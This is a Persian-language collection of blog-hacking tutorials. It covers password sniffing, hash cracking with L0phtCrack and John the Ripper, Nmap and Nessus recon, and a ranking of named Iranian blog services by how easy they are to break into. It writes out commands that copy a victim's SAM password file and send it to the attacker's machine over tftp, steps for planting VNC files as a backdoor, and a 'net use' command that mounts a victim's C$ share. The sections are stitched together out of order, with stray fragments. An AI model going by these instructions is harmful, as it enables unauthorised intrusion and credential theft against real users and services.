آموزش هک کردن وبلاگ (1)
با سلام خدمت تمامی بازدیدکنندگان محترم وبلاگ:
خوب امروز هم همینطوری که گفتم می خوام روش هک کردن یک وبلاگ به صورت کاملا حرفه ای نه بچه بازی که برای صاحب وبلاگ یه تروجان یا یهMagic-Ps بفرستیم بعد ببینیم که روشمون نگرفته و نا امید شیم.
آموزش هک کردن وبلاگ یا همان آموزش هک وبلاگ:(*sharorر*)
هک کدن یک وبلاگ به صورت حرفه ای کار چندان ساده ای نیست و مستلزم این است که شما با مفاهیم کلی شبکه و کار با نرم افزارهای , IP sniffer NMAP , Nessus بلد باشید و بتوانید با Exploit ها کار کنید البته من نمی خواهم شما را از این کار نا امید کنم ولی بهتر است این نرم افزارها و چیزهایی را که گفتم بلد باشید
خوب ما برای هک کردن یک وبلاگ باید سرور و یا سرویس دهنده ی آن را اول هک کنیم تا بتوانیم رمزها و یوزرنیم های وبلاگ یا وبلاگ های تحت سرویس آن سرور را پیدا کنیم معمولا یوزر نیم ها و یا همان آدرس وبلاگ مثل:
http://www.victim.blogserver.com
که victim آدرس و یوزر نیم وبلاگ است کد بندی نشده است و به راحتی پس از نفوذ به سرویس دهنده ی وبلاگ می توانیم آن را پیدا کنیم اما پسوردها معمولا کدبندی شده اند و ما باید با استفاده از ابزارهای(*sharorر*) کرک پسورد،آن پسوردها را از حالت کد شده خارج کنیم که من در زیر اسم چندتا برنامه ی معروف کرک پسورد یا Password Cracker را گذاشته ام:
John the ripper
L0pht crack
آموزش هک کردن وبلاگ (2)
ما برای این کار نیاز به یک نرم افزار Sniffer داریم.شما می توانید با سرچ کردن عنوان:
Free IP Sniffer download
از یکی از سایت های پیدا شده آن را دانلود کنید.در اینترنت تعداد زیادی Sniffer وجود دارد که هریک کار خاصی را انجام می دهند البته این نکته را بگویم که آن ها خریدنی هستند و پس از مدتی از کار می افتند.من خودم هر چه قدر که دنبال یک سریال نامبر برای آن ها گشتم پیدا نکردم.ما برای این کار به IP Sniffer،Password Sniffer و Http Sniffer نیاز داریم.هنگامی که شما نرم افزارهای ذکر شده را دانلود کردید و اجرا کردید،باید یک آدرس آی پی در قسمت IP وارد کنید.این آی پی آدرس می تواند آی پی یک سرور وبلاگ یا هر صفحه ای که در آن رمز می زنند باشد((البته به غیر از یاهو و ایمیل های معتبر)).پس از این که آدرس آی پی را وارد کردید دکمه ی Listen را بزنید((اگر این دکمه نبود هر دکمه ای را که به نظر شما می تواند به آن آی پی آدرس وصل شود را بزنید)) اکنون برنامه تمامی پاکت های اطلاعاتی را که در آن لحظه بین Server و Client ردو بدل می شود را برداشته و تمامی مشخصات و محتوای آن ها را نشان می دهد البته اگر کد شده نباشند ولی بیشتر اوقات فقط پسورد کد شده است و یوزر یم و بقیه ی مشخصات به طور واضح مشخص هستند.البته با این روش شما دیگر نمی تواند یک وبلاگ مشخص را هک کنید بلکه تنها وبلاگ هایی را که مدیر آن ها در آن لحظه Log in کرده را می توانید هک کنید((بازهم به شرطی که پسورد و یوزر نیم را داشته باشید)).البته باز هم بگویم که احتمال موفقیت در این روش کمتر از روش قبلی است.
اینم از آموزش امروز.
پاسخ به سوالات دوستان:
سوال: یکی از دوستان گفته بودند که وبلاگم هک شده حالا من چه طوری می تونم اون رو پس بگیرم؟
جواب:دوستان عزیز شاید این سوال سوال بیشتر شما باشد که چگونه می توانیم وبلاگ هک شده را پس بگیریم؟
اگر .بلاگ شما مانند این نمونه
http://www.hack1.blogfa.com
هک شده باشد شما می توانید به راحتی آن را پس بگیرید.برای این کار یکبار دیگه با یکی از روش هایی که گفتم وبلاگ خودتان را هک کنید.هکری که وبلاگ شما را هک کرده تنها پسورد آن را عوض کرده است.
اما اگر یک نفر وبلاگتان را هک کرد و هنگامی که به وبلاگ خود رفتید و یک صفحه ی سفید با آیکن ضریدری مثل این که یه عکس لود نشده باشه مواجه شدید و یا وبلاگتان همه چیزش در بر هم شده بود،امکان پس گرفتن آن وجود ندارد مگر این که از خود ادمین و مسئول سرور وبلاگ بخواهید تا او پسورد را برای شما بفرستد.
Palm crack
که می توانید با جستجو در گوگل لینک دانلود آن ها را پیدا کنید و پس از دانلود از آن ها استفاده کنید که کار با آن ها بسیار آسان است بدین ترتیب که شما کلمه ی کد شده را به آن می دید و برنامه نسبت به اندازه ی ((Length)) آن شروع به شکست کد آن می نماید.یادتان باشد که L0pht crack بعد از حرف L صفر یعنی0 را دارد نه O
حالا ما چگونه به یک سرور وارد شویم؟
شما می توانید با پیدا کردن Vulnerability های یک سرویس دهنده ی وبلاگ به کمک برنامه های NAMP و یا Nessus و امتحان Exploit های نوشته شده برای آن آسیب پذیری ها ((Vulnerability)) به سیستم سرور نفوذ کرده و کنترل آن را در دست بگیرید البته این یادتان باشد که فقط به قسمت اطلاعات سرور که معمولا دارای آسیب پذیری است نفوذ کنید و به قسمت های دیگر به هیچ عنوان نوذ نکنید در ضمن این کار با هک کردن سایت فرق می کند اما روش های نزدیک به همی برای انجام هر دوی آن ها استفاده می شود
در این جا من نام چند سرویس دهنده ی وبلاگ های فارسی را از بیشترین آسیب پذیری به کمترین آسیب پذیری می نویسم:
1. Persianblog
2. Mihanblog
3. caspianblog
4. parsiblog
5. blogfa
6. persia ngig
البته بلاگفا تا چند روز پیش در رده ی دوم قرار داشت اما به دلیل اخذ تدابیر امنیتی خوب در رده ی پنجم جای گرفت.البته من این رده بندی را براساس تعداد وبلاگ های هک شده ی آن سرور،تدابیر امنیتی اتخاذ شده ی آن سرور،تعداد دفعاتی که خودم به آن سرور نفوذ کرده ام و سوال از حدود 16 هکر انجا داده ام.
البته اگر این را برای شما سخت است(*sharor*)من در پست بعد روش دیگری را که کمی آسان تر است را به شما می گویم.
خوب این هم از آموزش هک کردن وبلاگ قسمت اول.
hak sit
Portscanning:Nmap : پورت دروازه هاي ورودي و خروجي ديتا روي يک سيستم يا شبکه است که براساس تعاريف شبکه بالغ بر 60هزار پورت وظايف متعددي را براي پروتکل هاي از قبل تعريف شده ، انجام مي دهند. يک هکر بايد در اين مرحله دست به اسکن شبکه بزند و به اصطلاح دل و روده سيستم و ماشين قرباني را شناسايي کند. براي اين کار بايد بداند کداميک از پورتها باز است و کدام بسته.
از روي همين اسکن کردن ساده مي توان حفره هاي باز را نيز روي سيستم حدس زد و يک قدم به جلو گذاشت.
معمولا اسکنرهاي زيادي در اينترنت وجود دارد که بعضا يا دچار اشکالات فني بوده و يا خودشان برنامه اي هکري محسوب مي شوند. به همين خاطر توصيه مي شود از اسکنرهاي بي نام و نشان استفاده نکنيد و حتي برنامه هاي نسخه آزمايشي را نيز روي سيستم خود اجرا نسازيد. بنابر تجربه بهترين اسکنر در اين زمينه Nmap است که برنامه اي فوق العاده دقيق با گرافيکي جذاب براي يک هکر به شمار مي رود. Nmap مخفف Network Mapper يا نقشه بردار شبکه است و يک منبع پرقدرت براي جستجو يا استماع روي شبکه رايانه اي محسوب مي شود. هنگام اجرا مي تواند ميزبان را شناسايي کرده و از طريق آي پي بفهمد چه سرويس هايي روي آن در حال اجراست و يا چه سيستم عاملي روي شبکه نصب است.
همچنين مي تواند بفهمد چه فايروال و يا فيلترهايي روي شبکه وجود دارد. يکي از دلايل برتري اش مجاني بودن آن است که در مقايسه با ساير برنامه ها اصولا از اوپن سورس بهره مي گيرد و توانايي بالايي دارد. مکانيسم اسکن آن روي پورتهاي تي سي پي و يودي پي واضح است.
انواع سيستم عامل ها مانند لينوکس ، ويندوز ، FreeBSD ، سولاريس ، YIR ، ماشين هاي مک و سان و آميگا را پشتيباني مي کند
اينک به سراغ گام دوم يعني اسکن کردن شبکه و محاسبات شمارشي (Scanning and enumerating) مي رويم».
اسکن کردن شبکه در فوت اسپرينگ ما حفره ها و سدها را مي شناسيم و با دستوراتي نظير Ping روي شبکه و روشهايي نظير Social engineering اطلاعات گام اول در شکستن شبکه را جمع آوري مي کنيم.
اما در گام دوم اولين قدم اسکن کردن شبکه و سرور قرباني است.
ما بايد بدانيم که چه نوع سيستم عاملي روي سرور نصب است و اين که به طور کلي شبکه قرباني از چه برنامه ها و سيستم عامل هايي براي اداره خود بهره مي گيرد تا بسته به نوع ماشين ها نوع و روشهاي حملاتمان نيز تعريف گردد. همين طور در قسمت محاسبات شمارشي يا enumerating بايد با شناسايي نام Domain ، صاحبان آن و پردازش موسوم به Whois از وجود اکانت ها و اسامي کاربران و اين که چه مقدار کاربر با چه سطح دسترسي وجود دارند ، مطلع شويم و ليستي از اسامي کاربران نظير Admin يا root از روي اول آدرس هاي ايميل را بسازيم.
بنابراين تا به اينجا ما شبکه قرباني را شناخته و با نوع سيستم عامل آن آشنا شده و بعد از تعداد و نوع اکانت ها نيز مطمئن شده ايم.
از طرف ديگر بايد ببينيم چه برنامه هايي و چگونه نصب شده و يا احتمالا مي شوند. بدين معني که چه برنامه هاي حفره داري روي سيستم قرباني هست و چگونه نصب شده و نيز اگر هکر بخواهد خود برنامه اي را روي سيستم قرباني نصب کند ، چگونه خواهد بود.
متدها و روشها :
ليستي از روشها و ابزار اسکن و enumerating به طور خلاصه در زير اشاره مي شود:
1- port Scanning : Nmap
2- Sniffing : ngrep
3- SNMP: Solarwinds
4- null Session : NBTenum
NBT dump
5- Netbios browsing : Netview Legion
6- Vulnerability Scanners : Nessus
Winfingerprint
LANGuard
براي ورود به شبكه يک هکر برنامه اي 4مرحله اي را در نظر گرفته و روي آن کار مي کند که شامل موارد زير است :
footprinting
scanning and enumerating
Researching
Exploiting
1- Footprinting : فوت پرينتينگ در علوم رايانه اي پردازش ديتاهاي انباشته شده در محيط شبکه خاص براي پيدا کردن راهي جهت دخالت و فضولي تعريف شده است.
فوت پرينتينگ مي تواند حفره هاي سيستم را آشکار کند تا به وسيله آن هکر به وسيله exploiting (سوءاستخراج) وارد شبکه شود.
بر اين اساس تعيين مکان و موضوع اينتروژن بر عهده فوت پرينتينگ است.
مثلا بيوگرافي خاص کاربران و دايرکتوري کارمندان و برخي اطلاعات آنان که روي محيط وب در شبکه ذخيره مي شود منبع خوبي است تا هکر به وسيله آن ديتاهاي مورد نظر را کسب کنند.
بنابراين جمع آوري اطلاعات اوليه به وسيله اين فاکتور انجام مي پذيرد.
حال اين که از چه فناوري اينترنتي و شبکه اي استفاده شده و سدهاي امنيتي جلوي سيستم و سرورها چه نوع هستند نيز مي تواند براي هکر راهگشا باشد.
هکر با دادن دستور Whois اول شناسنامه سرور قرباني را بيرون مي کشد.
مي توان از بسياري از سايت هايي که مشخصات سايت ها را ثبت کرده اند اين اطلاعات را کسب کرد و شماره آي پي ماشين ها را بيرون کشيد.
با همين روش مي توان صفحات مشخص کاربران و شماره تلفن آنها را ديد و حتي با يک کامند روي کدهاي HTML نوشته شده براي حمايت به شبکه وارد شد.
گفتني است روش موسوم به Socialengineering به عنوان يکي از متدهاي نفوذ در شبکه در زير مجموعه فوت پرينتينگ به شمار مي آيد.
مثلا يک هکر در لباس دوست برايتان ايميل مي زند و داخل ايميل از شما اطلاعاتي مي گيرد که نبايد آن را بدهيد.
حتي با شما دوست مي شود و به شبکه شما نيز مي آيد بدون آن که متوجه شويد.
اين روش بعضي مواقع راهبران را گول زده و باعث مي شود خودشان با دست خودشان شبکه شان را به باد دهند.
در ضمن Ping کردن و دستورات رسيدن به آدرسهاي اينترنتي از طريق برودکست نيز جزو فوت پرينتينگ است.
حمله يا از طريق محلي صورت مي گيرد و يا از راه دور در حمله محلي حمله به ورك استيشن صورت مي گيرد.
ماشين ورك استيشن (work station) همان ماشيني محسوب مي شود كه كاربر پشت آن نشسته و با آن كار مي كند.
اما دلايلي كه بايد نسبت به اين گونه حملات كه بعضا در بعضي مواقع دودمان يك سازمان را به باد مي دهد حساس باشيم ، به شرح زير است :
يكي اين كه دسترسي هكر به ورك استيشن متصل به شبكه بدين معناست كه وي مي تواند به راحتي به ليست كاربران ، اطلاعات دوباره سيستم ها و سرورها دسترسي نامحدود پيدا كند.
نكته بعدي اين كه هكرها مي توانند از طريق فيزيكي و نشستن پشت يك رايانه ساده ، ابتدا كلمه عبور آن را كشف كرده و وقتي وارد آن شدند دسترسي به سرورها را به راحتي آب خوردن براي خود فراهم نمايند.
نكته مهم تر اين كه اگر يك كاربر ساده از طريق ورك استيشن يك برنامه جاسوسي يا اسب تروا را نصب كند آن وقت تمامي اطلاعات حساس شبكه به يغما رفته بدون اين كه كسي متوجه شود.
انواع حملات محلي روي ورك استيشن
الف - عمومي ترين نوع حمله روي يك ماشين ورك استيشن به دست آوردن توانايي راهبري (Admin در ويندوز Root در سيستم هاي اوپن سورس مثل لينوكس) سيستم است.
معمولا در ويندوز ورك استيشن هكرها با تغييرنام (Rename) يا پاك كردن پوشه SAM در آدرس زير به راهبري ماشين دست مي يابند.
C:\ winnt\ system32\ config\ SAM
و در لينوكس با پرامت تحت Lilo و تايپ كلمه Linuxs مي توان به توانايي راهبري سيستم بعنوان يك هكر دسترسي يافت.
ب : راه ديگر شكستن كلمه عبور است كه معمولا با برنامه هاي پسوردشكن مثل Lophtcrack (LC) هكر موفق به انجام اين كار مي شود و در بوت مجدد سيستم به راهبري دسترسي مي يابد.
ج : نوع بعدي حمله روي ورك استيشن سرقت هارد ماشين و قراردادن آن روي يك رايانه ديگر در همان مجموعه يا جاي ديگر است كه به همين راحتي اجازه سرقت اطلاعات بدون نفوذ از راه دور را مي دهد.
معمولا سازمانهاي بزرگ كه ديتاهاي حساس را روي شبكه نگه نمي دارند هزينه زيادي براي حفظ امنيت فيزيكي ورك استيشن هاي خود مي كنند تا بند را آب ندهند.
د: آخرين نوع حمله روي ورك استيشن اجراي كامندها و دستورات خاص هنگام Login كردن به سيستم و يا سوء استخراج كردن فايل ها (Exploiting files) است تا بوسيله آن به سيستم از طريق فيزيكي دسترسي يافت.
يك راه بسيار حياتي اضافه كردن يك user يا اسم كاربري به سيستم از طريق دستورات اديت در رجيستري است كه بوسيله آن مي توان بدون داخل شدن به سيستم از طريق Regedit يك اسم كاربري در حد راهبر ساخت و وارد آن شد.
راه ديگر دسترسي به ليست برنامه هاي مشترك ميان كاربران در شاخه زير است:
c:\ Document and settings\ All users\ start menu\ programs\ startup
عينک آفتابي فراموش نشود. سيستم خود را که ترجيحا ان تي است بالا بياور و با آن به اينترنت وصل شو. حال ، دنبال يک آي پي قرباني بگرد که آن نيز ان تي باشد. به راحتي با برنامه هاي اسکنر مي تواني شماره آي پي يک سايت را با دستور Ping روي داس به دست آوري. حالا آي پي را وارد اسکنر مثل languard کرده و ok کن تا بفهمي سرور طرف ان تي است. با مطمئن شدن حالا در مرحله بعد بايد بداني که فايل به نام sam روي ان تي است که کلمه عبور هر چقدر هم بزرگ و طولاني باشد روي آن ذخيره مي شود. بنابراين بايد فايل sam را در ابتدا بشکني. اين فايل روي آي پي و سيستم قرباني (ماشيني که بدان حمله مي شود) وجود دارد. اما براي انتقال sam فايل سيستم بايد بتواند با برنامه tftpکار کنيد. اين برنامه را براحتي مي توانيد از روي اينترنت با جستجوي آن در گوگل با تايپ tftp32 پيدا کنيد. سپس آن را روي سيستم خود نصب کرده و 2دستور زيرا را اجرا کنيد : Copy C:\winnt\repair\sam C:\sam tftp-i IP.IP.IP.IP Put C:\sam حالا فايل sam سيستم قرباني روي ماشين شما مي آيد. در مرحله بعد بايد اين فايل sam را به نوعي درون شکني کرده تا کلمه عبور کد شده را از آن بيرون بکشيد. براي اين کار بهترين روش دانلود و نصب برنامه اي به نام I0phat است که به راحتي با راه اندازي آن و قرار دادن فايل sam داخل آن مي توانيد به کلمه عبور دست يابيد. اوکي ! اکنون زمان ستاپ کردن برنامه VNC است. بايد يک کپي معتبر از اين برنامه پيدا کنيد که البته از سايت زير مي توانيد آن را برداشته و روي سيستم خود نصب کنيد: http://www.uk.resarch.att.com/Vnc/download.html (برخي از کپي هاي موجود خود يک سارق حرفه اي به شمار مي رود). شما به 3فايل تحت نامهاي زير احتياج داريد : Winvnc.exe Vnchooks.dll omnithread-rt.dll از کجا اين فايل ها را به دست آورديد؟ خوب معلوم است از روي برنامه VNC که روي سيستم خود نصب کرده ايد. اوکي ! فايل omnithread-rt.dll را درون شاخه Winnt\system32\directory\ و 2 فايل ديگر را درون شاخه Winnt\system32\Viewers\ قرار بدهيد.
haksitبا استفاده از xp
در اين مقاله ميخواهم راجع به يكي امكانات بسيار جالب و سودمند ويندوز XP صحبت كنم كه كمتر كاربري از آن اطلاع دقيق دارد ! حتما تا به حال نام Remote Desktop را شنيده ايد و شايد با آن كار هم كرده باشيد. اين برنامه يكي از برنامه هاي بسيار كاربردي در ويندوز XP ميباشد كه در عين سادگي امكانات جالبي را براي كاربران فراهم ميكند. كار اصلي اين برنامه برقرار كردن ارتباط سيستم شما با يك سيستم موجود در شبكه و اينترنت است. اما بحث من اصلا راجع به اين برنامه نيست ! اين حرفها مقدمه اي بود براي معرفي ابزاري با كارايي مشابه اما بسيار جالب تر از Remote Desktop . نام اين ابزار يا بهتر بگويم قابليت در ويندوز XP ( نسخه حرفه اي ) ، Remote Desktop Web Connection است. اين ابزار به شما اجازه ميدهد كه توسط مرورگر خود به سيستم مورد نظر وارد شويد و كنترل آن را به دست بگيريد ! بله درست است توسط مرورگر و اين همان قابليت بسيار جالب آن است كه كاركرد آن را تا حدودي شبيه برخي از تروجانها كرده است. با كمك اين ابزار شما ميتوانيد به راحتي حتي به سيستمي كه فايل Client ابزار Remote Desktop در آن نصب نشده است وارد شده و كنترل آن را به دست بگيريد. در اين روش شما تنها با فايلهاي ActiveX سروكار داريد و آن هم فقط بايد قابليت پشتيباني از اين فايلها توسط مرورگر شما و سيستم هدف فعال باشد. براي فراگيري آموزش با ادامه مقاله همراه باشيد. كامپيوتر ميزبان را آماده كنيد : در ابتدا بايد به اين نكته توجه كنيد كه اين قابليت تنها در ويندوز XP نسخه Professional وجود دارد و در نسخه Home Edition اين قابليت وجود ندارد و شما نميتوانيد از آن استفاده كنيد. اولين مرحله فعال كردن قابليت Remote Desktop Web Connection در ويندوز XP و نصب كردن برنامه هاي ( كامپوننت هاي ) مورد نياز در كامپيوتر ميزبان يا كامپيوتر هدف است. قابليت Remote Desktop Web Connection از يك كامپوننت جهاني اينترنت استفاده ميكند كه به اصطلاح به آن World Wide Web Service component of Internet Information Service يا IIS ميگويند. اين كامپوننت ( IIS ) به صورت پيش فرض در ويندوز XP Professional وجود دارد اما معمولا و در حالت كلي غير فعال است. كار كامپوننت IIS پاسخگويي به درخواستهاي مرورگر وب يا Web Browser ميباشد و در واقع ايجاد يك سرور مجازي در سيستمي كه روي آن نصب ميشود. براي فعال كردن اين قابليت سي دي ويندوز XP را آماده كرده و مراحل زير را انجام دهيد : ابتدا وارد Control Panel شده و روي عبارت Add or Remove Programs دو بار كليك كنيد تا اين ابزار اجرا شود. سپس روي دكمه Add/Remove Windows Component از دكمه هاي موجود در سمت چپ ابزار كليك كنيد. پس از كمي تامل صفحه Windows Component Wizard ظاهر خواهد شد. در ليست Component هاي موجود در اين صفحه روي عبارت ( Internet Information Service ( IIS كليك كنيد و سپس روي دكمه Details كليك كنيد. با اين كار صفحه Internet Information Services ظاهر خواهد شد. در اين صفحه روي عبارت World Wide Web Service كليك كرده و دكمه Details را بفشاريد. در صفحه اي كه باز ميشود تيك كنار عبارت Remote Desktop Web Connection را فعال كنيد ( توجه داشته باشيد كه با فعال كرده اين گزينه ، گزينه World Wide Web Service نيز كه همين ليست وجود دارد فعال خواهد شد ) و روي OK كليك كنيد. مجددا روي OK كليك كنيد تا به صفحه Windows Component Wizard بازگرديد. بعد روي دكمه Next كليك كرده و سي دي ويندوز XP را درون درايو سي دي رام خود قرار دهيد و منتظر بمانيد تا مراحل نصب كامپوننت به پايان برسد و در نهايت روي Finish كليك كنيد تا عمليات به اتمام برسد. با اين كار مراحل نصب انجام شده و سيستم براي مراحل بعدي آماده ميباشد ، اما در اينجا براي بالابردن هر چه بيشتر امنيت سيستم و جلوگيري از هر گونه نفوذ غير مجاز به آن ، بعد از اينكه مراحل بالا را انجام داديد ، قبل از هر گونه اتصال به اينترنت مراحل زير را نيز انجام دهيد : ابتدا از منوي Start ابزار Run را اجرا كرده و در آن عبارت زير را تايپ كنيد و سپس Enter را بزنيد : Net Stop w3svc اجراي اين دستور باعث ميشود كه قابليت World Wide Web Service در سيستم شما به صورت موقت متوقف شود و به اين ترتيب امنيت سيستم در اينترنت حفظ خواهد شد. توجه داشته باشيد كه در صورت فعال كردن قابليت IIS و نصب نكردن پچ هاي امنيتي كه در اين مورد از طرف Microsoft ارائه شده است ، به راحتي سيستم شما را در برابر نفوذ غير مجاز آسيب پذير خواهد كرد. براي دريافت اطلاعات بيشتر و دريافت پچ هاي امنيتي IIS ميتوانيد به اين آدرس و اين آدرس مراجعه كنيد. پس از نصب پچ هاي مورد نياز از طريق وارد كردن دستور زير در Run ، مجددا ميتوانيد كامپوننت را فعال كنيد : Net Start w3svc اين كار را انجام دهيد ( البته بعد از نصب پچ هاي امنيتي ). حال نوبت به پيكره بندي قابليت IIS ميرسد : به صورت پيش فرض IIS در كامپيوتر شما با پورت TCP به شماره 80 شناسايي ميشود و از اين پورت استفاده ميكند. در اين جا با يك آموزش ساده شماره اين پورت را تغيير خواهيم داد. اين كار باعث افزايش هر چه بيشتر امنيت در استفاده از اين روش ميشود. بنابراين پيشنهاد ميكنم حتما اين كار را انجام دهيد. ابتدا وارد Control Panel شده و روي عبارت Administrative Tools دو بار كليك كنيد. سپس روي عبارت Internet Information Services دو بار كليك كنيد. با اين كار اين ابزار اجرا خواهد شد و صفحه اي تحت عنوان همين نام باز خواهد شد. در ليست سمت چپ اين ابزار نام كامپيوتر خود را مشاهده ميكنيد. روي علامت مثبت كنار آن كليك كنيد تا زير مجموعه هاي آن را مشاهده كنيد. در همين ليست روي علامت مثبت كنار عبارت Web Sites كليك نماييد. در زير مجموعه آن عبارت Default Website وجود دارد. روي آن راست كليك كرده و گزينه Properties را انتخاب نماييد. در صفحه اي باز ميشود شما چندين شاخه مختلف را مشاهده خواهيد كرد. به صورت پيش فرض شاخه Web Site براي شما نمايش داده ميشود. در قسمت Web Site Identification شما عبارتي با عنوان TCP Port را مشاهده خواهيد كرد كه به صورت پيش فرض عدد 80 در مقابل آن نوشته شده است. شما بايد اين عدد را تغيير دهيد و به جاي آن عدد دلخواهي بين 1024 و 65535 را وارد نماييد ( توجه داشته باشيد كه عدد انتخابي شما نبايد با پورت هاي مورد استفاده توسط نرم افزارهاي نصب شده در سيستم شما مطابقت داشته باشد ، در اين صورت باعث بروز اختلالاتي در ارتباطات اينترنتي اين نرم افزارها خواهد شد ). پس از انتخاب پورت دلخواه و وارد كردن آن ، روي دكمه OK كليك كنيد. پس از اين كار ميتوانيد از اين بخش خارج شويد. حال نوبت به فعال كردن قابليت Remote Desktop و تنظيم كردن آن ميرسد. براي اين منظور ابتدا روي آيكن My Computer راست كليك نموده و گزينه Properties را انتخاب نماييد. در صفحه اي كه ظاهر ميشود وارد شاخه Remote شويد. در اين شاخه و در قسمت Remote Desktop تيك كنار عبارت Allow users to connect remotely to this computer را فعال نموده ( در صورت عدم فعال بودن ) و سپس در پيغامي كه ظاهر ميشود روي دكمه OK كليك نماييد. پس از اين كار روي دكمه Select Remote Users در همين صفحه كليك كرده و سپس در صفحه اي كه باز ميشود روي دكمه Add كليك كنيد. در قسمت Enter the object name to select نام يوزر مورد نظر را ( براي برقراري ارتباط با آن ) وارد نماييد و سپس روي دكمه OK كليك كنيد. توجه داشته باشيد كه اين يوزر بايد در سيستم شما ثبت شده باشد ، براي فهميدن نام يوزر هاي ثبت شده در سيستم خود ميتوانيد در صفحه Select Users روي دكمه Advanced كليك نماييد. سپس روي دكمه Find Now كليك نماييد تا ليستي از يوزر هاي موجود در سيستم شما در زير آن نمايش داده شود. بهتر است براي بالابردن هر چه بيشتر امنيت براي يوزر مورد نظر خود حتما رمز عبور تعيين نماييد كه اين كار را ميتوانيد از قسمت User Accounts در Control Panel و گزينه Create a password انجام دهيد. پس از انتخاب يوزر مورد نظر و وارد كردن نام آن در قسمت ذكر شده روي دكمه OK كليك كنيد. مجددا روي OK كليك كنيد تا وارد صفحه System Properties شويد. با كليك مجدد بر روي دكمه OK از اين صفحه نيز خارج شويد. توجه داشته باشيد كه اين مراحل بايد در سيستم هدف انجام شوند. در اين مرحله نوبت به كاربراني ميرسد كه از فايروال در سيستم خودشان استفاده ميكنند. اين دسته از كاربران بايد فايروال خود را به نحوي تنظيم نمايند كه ممنوعيتي براي پورت هاي مورد استفاده در كار شما ايجاد ننمايد. ما در اين عمليات به پورت 3389 از نوع TCP ( كه براي ارتباط Remote Desktop نياز است ) و پورت TCP اي كه شما به دلخواه انتخاب كرديد نياز خواهيم داشت. بنابراين حتما اين موارد را در تنظيمات فايروال خود لحاظ كنيد. حال به مرحله اصلي عمليات خود يعني ارتباط با سيستم راه دور ميرسيم. براي برقراري اين ارتباط شما حتما بايد شماره IP سيستم راه دور را بدانيد. براي اين منظور ميتوانيد از ابزارهاي مختلفي كه براي اين منظور ميتوانيد در سيستم راه دور نصب نموده و از شماره IP آن مطلع شويد استفاده نماييد و يا روشهاي ديگر را استفاده نماييد. با توجه به اينكه اغلب كاربران با اين موارد آشنايي دارند از توضيحات اضافه در اين مورد خودداري ميكنم. فرض ميكنيم شماره IP سيستم راه دور 197.123.146.166 باشد و پورت انتخاب ما در تنظيمات آن سيستم 8080 ميباشد. ابتدا مرورگر IE خود را باز كرده و در نوار آدرس آن عبارت زير را تايپ نموده وEnter را ميزنيم : /http://197.123.146.166:8080/tsweb توجه نماييد كه شكل كلي اين آدرس به شكل /http://IPaddress:port/tsweb ميباشد. پس از اجراي آدرس بالا اگر پيغامي در مورد نصب Remote Desktop ActiveX Control ظاهر شد روي دكمه Yes كليك نماييد و منتظر بمانيد تا عمليات نصب ActiveX به پايان برسد. پس از پايان نصب صفحه اي به شكل زير ظاهر خواهد شد : در اين صفحه دو گزينه وجود دارد. در قسمت Server نيازي به وارد كردن هيچ اطلاعاتي نميباشد و در قسمت Size نيز ميتوانيد اندازه صفحه كاري خود را تغيير دهيد ( پيشنهاد من همان Full Screen است ). بنابراين بدون تغيير دادن موارد روي دكمه Connect كليك كنيد تا صفحه زير ظاهر گردد : در اين قسمت يوزر نيم و پسوردي را كه در قسمتهاي قبل براي برقراري ارتباط با آن مشخص نموديد را وارد كرده و روي دكمه OK كليك كنيد تا ارتباط برقرار شود. پس از اين كار شما ميتوانيد به محيط كاري سيستم مورد نظر وارد شده و در آن به فعاليت بپردازيد. پس از اتمام كار ميتوانيد با بستن مرورگر و قطع ارتباط با اينترنت از اين محيط خارج شويد. در اين حالت ميتوانيد مطمئن باشيد كه يوزر نيم و پسورد شما در هيچ كجا ثبت نشده و هيچ كاربر ديگري نخواهد توانست به آن سيستم دسترسي پيدا كند و يا متوجه يوزر نيم و پسورد شما شود. اگر براي مدت طولاني از IIS استفاده نميكنيد توصيه ميكنم حتما آن را با روشي كه در بالا آموزش داده شد و يا از طريق همان مسير موجود در Control Panel و Administrative Tools به صورت موقت و تا نياز بعدي خود ، غير فعال نماييد. اميدوارم اين آموزش مورد توجه شما عزيزان قرار گرفته باشد. موفق باشيد.
haksit
سلام دوستان
خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا بايد به سيستم طرف براي نصب تروجان نفوذ كنيد و نت بايوس بهترين راه هست!
نفوذ به سيستم از طريق NetBios
-------------------------------------------
با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید.
خب بریم سره موضوع اصلی:
اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \\IP\DriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \\80.191.191.39\c$
